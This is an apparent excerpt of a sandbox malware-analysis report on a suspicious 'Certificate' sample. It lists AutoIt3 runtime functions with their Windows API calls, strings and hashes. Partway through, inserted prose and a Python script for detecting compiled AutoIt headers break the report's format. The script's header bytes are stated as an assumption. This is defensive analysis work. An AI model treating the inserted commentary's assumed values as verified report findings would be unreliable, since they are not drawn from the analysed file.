                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                              • String ID:
                                                                              • API String ID: 1996641542-0
                                                                              • Opcode ID: 73fa883f7405b2c8c8b725f19cf0877da5234b860e69b379f2f1f249e9b32157
                                                                              • Instruction ID: 1c8e7c241828e97c259747142d0ea75bc5f5d93a9b22016bf72b5d58462b4624
                                                                              • Opcode Fuzzy Hash: 73fa883f7405b2c8c8b725f19cf0877da5234b860e69b379f2f1f249e9b32157
                                                                              • Instruction Fuzzy Hash: D4519E79906218BFDF109FA8DC48EAE7B79FF09324F204111FA15AB2A5D7709A00DF90
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0092B7B0
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0092B7C1
                                                                              • CharNextW.USER32(0000014E), ref: 0092B7F0
                                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0092B831
                                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0092B847
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0092B858
                                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0092B875
                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 0092B8C7
                                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0092B8DD
                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 0092B90E
                                                                              • _memset.LIBCMT ref: 0092B933
                                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0092B97C
                                                                              • _memset.LIBCMT ref: 0092B9DB
                                                                              • SendMessageW.USER32 ref: 0092BA05
                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 0092BA5D
                                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 0092BB0A
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0092BB2C
                                                                              • GetMenuItemInfoW.USER32(?), ref: 0092BB76
                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0092BBA3
                                                                              • DrawMenuBar.USER32(?), ref: 0092BBB2
                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 0092BBDA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                              • String ID: 0
                                                                              • API String ID: 1073566785-4108050209
                                                                              • Opcode ID: 6c1a6c8a2437a1ba9d924ed517be18d00cb3754938d0945d4cb8c79066f05772
                                                                              • Instruction ID: 37ceea44608a45ffdf5c389e4e6527a015c8b0ef99f6c2ae9c115349e5c73bec
                                                                              • Opcode Fuzzy Hash: 6c1a6c8a2437a1ba9d924ed517be18d00cb3754938d0945d4cb8c79066f05772
                                                                              • Instruction Fuzzy Hash: ECE1CE74900228ABDF20DFA5DC84EEE7BBCFF05714F148156FA19AA294D7748A81DF60
                                                                              APIs
                                                                              • GetCursorPos.USER32(?), ref: 0092778A
                                                                              • GetDesktopWindow.USER32 ref: 0092779F
                                                                              • GetWindowRect.USER32(00000000), ref: 009277A6
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00927808
                                                                              • DestroyWindow.USER32(?), ref: 00927834
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0092785D
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0092787B
                                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 009278A1
                                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 009278B6
                                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 009278C9
                                                                              • IsWindowVisible.USER32(?), ref: 009278E9
                                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00927904
                                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00927918
                                                                              • GetWindowRect.USER32(?,?), ref: 00927930
                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00927956
                                                                              • GetMonitorInfoW.USER32 ref: 00927970
                                                                              • CopyRect.USER32(?,?), ref: 00927987
                                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 009279F2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                              • String ID: ($0$tooltips_class32
                                                                              • API String ID: 698492251-4156429822
                                                                              • Opcode ID: 0e7be27ea3ba89b2c9d922f19955013d3c2a2fd4cd61235b033b56e5fd158e6a
                                                                              • Instruction ID: 921ab0ca1af2ad32312114af170d033094ee1eed98c67b90b6c6431fe2a9bd88
                                                                              • Opcode Fuzzy Hash: 0e7be27ea3ba89b2c9d922f19955013d3c2a2fd4cd61235b033b56e5fd158e6a
                                                                              • Instruction Fuzzy Hash: CDB16C75608311AFDB04DFA8D988B5AFBE4FF89310F00891DF599AB295D770E844CB92
                                                                              APIs
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008DA939
                                                                              • GetSystemMetrics.USER32(00000007), ref: 008DA941
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008DA96C
                                                                              • GetSystemMetrics.USER32(00000008), ref: 008DA974
                                                                              • GetSystemMetrics.USER32(00000004), ref: 008DA999
                                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 008DA9B6
                                                                              • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 008DA9C6
                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 008DA9F9
                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 008DAA0D
                                                                              • GetClientRect.USER32(00000000,000000FF), ref: 008DAA2B
                                                                              • GetStockObject.GDI32(00000011), ref: 008DAA47
                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 008DAA52
                                                                                • Part of subcall function 008DB63C: GetCursorPos.USER32(000000FF), ref: 008DB64F
                                                                                • Part of subcall function 008DB63C: ScreenToClient.USER32(00000000,000000FF), ref: 008DB66C
                                                                                • Part of subcall function 008DB63C: GetAsyncKeyState.USER32(00000001), ref: 008DB691
                                                                                • Part of subcall function 008DB63C: GetAsyncKeyState.USER32(00000002), ref: 008DB69F
                                                                              • SetTimer.USER32(00000000,00000000,00000028,008DAB87), ref: 008DAA79
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                              • String ID: AutoIt v3 GUI
                                                                              • API String ID: 1458621304-248962490
                                                                              • Opcode ID: 374fad3e4dd4984384bf7dcf18630747dd156a8308f778b4a9e783c6fe24a57c
                                                                              • Instruction ID: d6f718fe8ef8372d6612fe7f21416efa5d58b4543222f95e41eeec7604b23b1f
                                                                              • Opcode Fuzzy Hash: 374fad3e4dd4984384bf7dcf18630747dd156a8308f778b4a9e783c6fe24a57c
                                                                              • Instruction Fuzzy Hash: 11B18A75A0520AAFDB14DFA8DC45BAE7BB8FB08314F11422AFA15E7390DB349841DF51
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Window$Foreground
                                                                              • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                              • API String ID: 62970417-1919597938
                                                                              • Opcode ID: 7b59216b35ae7580afed3af0ba858218f0fd9832076cd839ccb93ddb8d82f44d
                                                                              • Instruction ID: 47c024d466ed3ab112462218518a337494ced59f3b45436ed32b648ed8204ebf
                                                                              • Opcode Fuzzy Hash: 7b59216b35ae7580afed3af0ba858218f0fd9832076cd839ccb93ddb8d82f44d
                                                                              • Instruction Fuzzy Hash: ABD1B730118346DBCB18EF64C881EAABBB4FF55344F104A2DF459975A1DB30E99ACF92
                                                                              APIs
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00923735
                                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0095DC00,00000000,?,00000000,?,?), ref: 009237A3
                                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 009237EB
                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00923874
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00923B94
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00923BA1
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Close$ConnectCreateRegistryValue
                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                              • API String ID: 536824911-966354055
                                                                              • Opcode ID: 11b591c0106295e26e48d0bf8b3f1b35310f3dddc54cc2c56239a1b2db5aa964
                                                                              • Instruction ID: b6e0b19d8c7d5d2bb83272a70a34a050578e0ad67fffd188557d6a29560ace78
                                                                              • Opcode Fuzzy Hash: 11b591c0106295e26e48d0bf8b3f1b35310f3dddc54cc2c56239a1b2db5aa964
                                                                              • Instruction Fuzzy Hash: 540249752046119FCB14EF28D845E2AB7E9FF89710F04895DF98A9B3A1CB34ED41CB82
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?), ref: 00926C56
                                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00926D16
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: BuffCharMessageSendUpper
                                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                              • API String ID: 3974292440-719923060
                                                                              • Opcode ID: b6e9de47dc64a1c7faead718e35941e9eef9741765b4e5128ecfc70820ce5620
                                                                              • Instruction ID: 35e0841b8156a83b8a34a6ab594d9cb748265f4d98db6647922f6edf83a92163
                                                                              • Opcode Fuzzy Hash: b6e9de47dc64a1c7faead718e35941e9eef9741765b4e5128ecfc70820ce5620
                                                                              • Instruction Fuzzy Hash: 61A18A312143559BCB14FF28D951E6AB3A5FF84310F10896DB99A9B7D6DB30EC06CB82
                                                                              APIs
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 008FCF91
                                                                              • __swprintf.LIBCMT ref: 008FD032
                                                                              • _wcscmp.LIBCMT ref: 008FD045
                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 008FD09A
                                                                              • _wcscmp.LIBCMT ref: 008FD0D6
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 008FD10D
                                                                              • GetDlgCtrlID.USER32(?), ref: 008FD15F
                                                                              • GetWindowRect.USER32(?,?), ref: 008FD195
                                                                              • GetParent.USER32(?), ref: 008FD1B3
                                                                              • ScreenToClient.USER32(00000000), ref: 008FD1BA
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 008FD234
                                                                              • _wcscmp.LIBCMT ref: 008FD248
                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 008FD26E
                                                                              • _wcscmp.LIBCMT ref: 008FD282
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                              • String ID: %s%u
                                                                              • API String ID: 3119225716-679674701
                                                                              • Opcode ID: e982a73a11683f03a0ad3feded5b9100edb02b1f0da1e3ce9ba8085072eac21b
                                                                              • Instruction ID: 0cdd26990e3c5731b44c281cb22e5dbc9a32283e35f57a415959c4c01a277b62
                                                                              • Opcode Fuzzy Hash: e982a73a11683f03a0ad3feded5b9100edb02b1f0da1e3ce9ba8085072eac21b
                                                                              • Instruction Fuzzy Hash: 59A18D7160470AABD715DF74C884FBAB7A9FF44354F008619EB99D2190DB30EA46CB91
                                                                              APIs
                                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 008FD8EB
                                                                              • _wcscmp.LIBCMT ref: 008FD8FC
                                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 008FD924
                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 008FD941
                                                                              • _wcscmp.LIBCMT ref: 008FD95F
                                                                              • _wcsstr.LIBCMT ref: 008FD970
                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 008FD9A8
                                                                              • _wcscmp.LIBCMT ref: 008FD9B8
                                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 008FD9DF
                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 008FDA28
                                                                              • _wcscmp.LIBCMT ref: 008FDA38
                                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 008FDA60
                                                                              • GetWindowRect.USER32(00000004,?), ref: 008FDAC9
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                              • String ID: @$ThumbnailClass
                                                                              • API String ID: 1788623398-1539354611
                                                                              • Opcode ID: bbb0ce86d2da3b377afad8aae1afa63096f459f3f134887e5a4f1c695fb1ca1a
                                                                              • Instruction ID: 0dcee09123aa969453233d28164d2bdea67fdde0bbf8c47dbab78aaa3a4c94bc
                                                                              • Opcode Fuzzy Hash: bbb0ce86d2da3b377afad8aae1afa63096f459f3f134887e5a4f1c695fb1ca1a
                                                                              • Instruction Fuzzy Hash: 6081AD311083499BDB01DF64C885FBA7BE9FF85314F04846AEF89DA096DB70D945CBA1
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                              • API String ID: 1038674560-1810252412
                                                                              • Opcode ID: cd471c4f7d7159b4db65271d2272826aadf825518ecb381fdb0053dae26d5533
                                                                              • Instruction ID: a64c0f1825c173f0c1b3d4155a7896503dd5e0628dbd8147c2ed748cce31fef8
                                                                              • Opcode Fuzzy Hash: cd471c4f7d7159b4db65271d2272826aadf825518ecb381fdb0053dae26d5533
                                                                              • Instruction Fuzzy Hash: 34319832A54308AADA14FB68CE43FADB3B6FB21758F200439F645F50D1FB61AA148612
                                                                              APIs
                                                                              • LoadIconW.USER32(00000063), ref: 008FEAB0
                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 008FEAC2
                                                                              • SetWindowTextW.USER32(?,?), ref: 008FEAD9
                                                                              • GetDlgItem.USER32(?,000003EA), ref: 008FEAEE
                                                                              • SetWindowTextW.USER32(00000000,?), ref: 008FEAF4
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 008FEB04
                                                                              • SetWindowTextW.USER32(00000000,?), ref: 008FEB0A
                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 008FEB2B
                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 008FEB45
                                                                              • GetWindowRect.USER32(?,?), ref: 008FEB4E
                                                                              • SetWindowTextW.USER32(?,?), ref: 008FEBB9
                                                                              • GetDesktopWindow.USER32 ref: 008FEBBF
                                                                              • GetWindowRect.USER32(00000000), ref: 008FEBC6
                                                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 008FEC12
                                                                              • GetClientRect.USER32(?,?), ref: 008FEC1F
                                                                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 008FEC44
                                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 008FEC6F
                                                                              Similarity
                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                              • String ID:
                                                                              • API String ID: 3869813825-0
                                                                              • Opcode ID: 2305ad11b553eb3fccb968d070805a42bbade7600db5090b56a9a90c6d67b167
                                                                              • Instruction ID: 2b93a9b75f2da9ea0c8b9c5a0ba26aea599783e7303d8e4ce8d026d631439b24
                                                                              • Opcode Fuzzy Hash: 2305ad11b553eb3fccb968d070805a42bbade7600db5090b56a9a90c6d67b167
                                                                              • Instruction Fuzzy Hash: DD513775900709AFDB21DFB8CD89F6EBBF5FF04709F004928E686A26A0D774A944DB10
                                                                              APIs
                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 009179C6
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 009179D1
                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 009179DC
                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 009179E7
                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 009179F2
                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 009179FD
                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00917A08
                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00917A13
                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00917A1E
                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00917A29
                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00917A34
                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00917A3F
                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00917A4A
                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00917A55
                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00917A60
                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00917A6B
                                                                              • GetCursorInfo.USER32(?), ref: 00917A7B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$Load$Info
                                                                              • String ID:
                                                                              • API String ID: 2577412497-0
                                                                              • Opcode ID: 66636e0dc15bec5920b9d42d4fb3b710cdc4eaf96e5733982aa445d79cc5c7a3
                                                                              • Instruction ID: d9c8a51880f367be2c38363df61cfda3fe2871aae193100cdefb1c25cf267e50
                                                                              • Opcode Fuzzy Hash: 66636e0dc15bec5920b9d42d4fb3b710cdc4eaf96e5733982aa445d79cc5c7a3
                                                                              • Instruction Fuzzy Hash: 9431C3B1E4831E6ADB509FB68C8999FFEB8FF04750F504526A50DE7280DA78A5408F91
                                                                              APIs
                                                                                • Part of subcall function 008DE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,008CC8B7,?,00002000,?,?,00000000,?,008C419E,?,?,?,0095DC00), ref: 008DE984
                                                                                • Part of subcall function 008C660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008C53B1,?,?,008C61FF,?,00000000,00000001,00000000), ref: 008C662F
                                                                              • __wsplitpath.LIBCMT ref: 008CC93E
                                                                                • Part of subcall function 008E1DFC: __wsplitpath_helper.LIBCMT ref: 008E1E3C
                                                                              • _wcscpy.LIBCMT ref: 008CC953
                                                                              • _wcscat.LIBCMT ref: 008CC968
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 008CC978
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 008CCABE
                                                                                • Part of subcall function 008CB337: _wcscpy.LIBCMT ref: 008CB36F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                              • API String ID: 2258743419-1018226102
                                                                              • Opcode ID: d167d9f8ec80c1aa77f0e09f2ec47d35f1d44b3ac6310062b7352682a3a8da49
                                                                              • Instruction ID: 68ae3f42ede3a00ff79a648cbbb10ba01dc2c5c19fd501a3991d5b89602171c6
                                                                              • Opcode Fuzzy Hash: d167d9f8ec80c1aa77f0e09f2ec47d35f1d44b3ac6310062b7352682a3a8da49
                                                                              • Instruction Fuzzy Hash: BD1258715083419FC724EF68C891AAEBBF5FF99314F40891EF589932A1DB30DA49CB52
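The string list of this script-loader function (AU3!, EA06, >>>AUTOIT SCRIPT<<<, and the #include / directive error messages) is what the AutoIt3 runtime checks when it reads a compiled script, and it is the evidence behind the "Binary is likely a compiled AutoIt script file" signature at the top of this report. The following Python is an added triage check, not code from the Joe Sandbox report or from AutoIt: it scans a byte buffer for those markers and distinguishes a full compiled-script header from the mere presence of the interpreter's own strings. The 16-byte magic that is widely documented to precede "AU3!EA06" in compiled binaries, and the sample bytes the block builds, are assumptions of the example and are not taken from the analysed file.

```python
"""
Added triage check for compiled AutoIt3 binaries.
Not part of the Joe Sandbox report; the markers below are the literals listed
for the script-loader function in the report, the 16-byte header is an
assumption based on public documentation of the AU3!EA06 format.
"""
import re
from dataclasses import dataclass
from typing import List

# Literals the loader function above compares against (from the report's string list).
AU3_MARKER = b"AU3!"                   # compiled-script signature prefix
AU3_SUBTYPE = b"EA06"                  # script format tag used by AutoIt v3.3.x
SCRIPT_TAG = b">>>AUTOIT SCRIPT<<<"    # tag checked when a script is loaded from a file
INCLUDE_ERR = b"#include depth exceeded"

# Assumption: 16-byte magic commonly documented to sit directly before "AU3!EA06".
AU3_HEADER = bytes.fromhex("A3484BBE986C4AA9994C530A86D6487D")


@dataclass
class AutoItIndicators:
    header_offsets: List[int]       # offsets of magic + "AU3!EA06" (strong indicator)
    signature_offsets: List[int]    # offsets of bare "AU3!EA06"
    interpreter_strings: List[bytes]  # loader literals seen in ASCII or UTF-16LE

    @property
    def is_compiled_autoit(self) -> bool:
        # Only a full script header says "embedded compiled script"; the
        # interpreter strings alone only prove the AutoIt runtime is present.
        return bool(self.header_offsets)


def find_all(haystack: bytes, needle: bytes) -> List[int]:
    """Return every offset at which needle occurs in haystack."""
    return [m.start() for m in re.finditer(re.escape(needle), haystack)]


def scan_autoit(data: bytes) -> AutoItIndicators:
    """Locate compiled-script headers and interpreter strings in a raw file image."""
    sig = AU3_MARKER + AU3_SUBTYPE
    sig_offsets = find_all(data, sig)
    header_offsets = [
        o - len(AU3_HEADER)
        for o in sig_offsets
        if o >= len(AU3_HEADER) and data[o - len(AU3_HEADER):o] == AU3_HEADER
    ]
    # The interpreter keeps these as separate (wide) literals, so check both encodings.
    found = []
    for s in (SCRIPT_TAG, INCLUDE_ERR, AU3_MARKER, AU3_SUBTYPE):
        if s in data or s.decode("ascii").encode("utf-16-le") in data:
            found.append(s)
    return AutoItIndicators(header_offsets, sig_offsets, found)


def build_sample(with_header: bool) -> bytes:
    """Constructed sample input (not bytes from the analysed file)."""
    body = b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x90" * 64
    body += "Error opening the file".encode("utf-16-le")
    body += SCRIPT_TAG.decode("ascii").encode("utf-16-le")
    if with_header:
        body += AU3_HEADER + AU3_MARKER + AU3_SUBTYPE + b"\x00" * 16 + b"compressed-script"
    return body


if __name__ == "__main__":
    for flag in (True, False):
        r = scan_autoit(build_sample(flag))
        print(f"header={flag}: compiled_autoit={r.is_compiled_autoit} "
              f"headers={r.header_offsets} strings={r.interpreter_strings}")
```

On a real sample, read the whole file (the compiled script is normally carried in a resource or the overlay, so do not restrict the scan to the code section) and treat a hit on the full header as the trigger for extracting the embedded script, while a hit on the interpreter strings alone only confirms the runtime.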
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0092CEFB
                                                                              • DestroyWindow.USER32(?,?), ref: 0092CF73
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0092CFF4
                                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0092D016
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0092D025
                                                                              • DestroyWindow.USER32(?), ref: 0092D042
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,008C0000,00000000), ref: 0092D075
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0092D094
                                                                              • GetDesktopWindow.USER32 ref: 0092D0A9
                                                                              • GetWindowRect.USER32(00000000), ref: 0092D0B0
                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0092D0C2
                                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0092D0DA
                                                                                • Part of subcall function 008DB526: GetWindowLongW.USER32(?,000000EB), ref: 008DB537
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                              • String ID: 0$tooltips_class32
                                                                              • API String ID: 3877571568-3619404913
                                                                              • Opcode ID: 637172047629397450b88ba414ae8fe6149f58ec66e5b36f2ec437ae8192953d
                                                                              • Instruction ID: 188a931c9151506a1a06662f19be6013d579e821d415f3b4aec27976b0dd3b9d
                                                                              • Opcode Fuzzy Hash: 637172047629397450b88ba414ae8fe6149f58ec66e5b36f2ec437ae8192953d
                                                                              • Instruction Fuzzy Hash: C271CCB4194305AFDB24CF28EC84F6A37E9EB89704F04451DF985872A1E730EC42DB22
                                                                              APIs
                                                                                • Part of subcall function 008DB34E: GetWindowLongW.USER32(?,000000EB), ref: 008DB35F
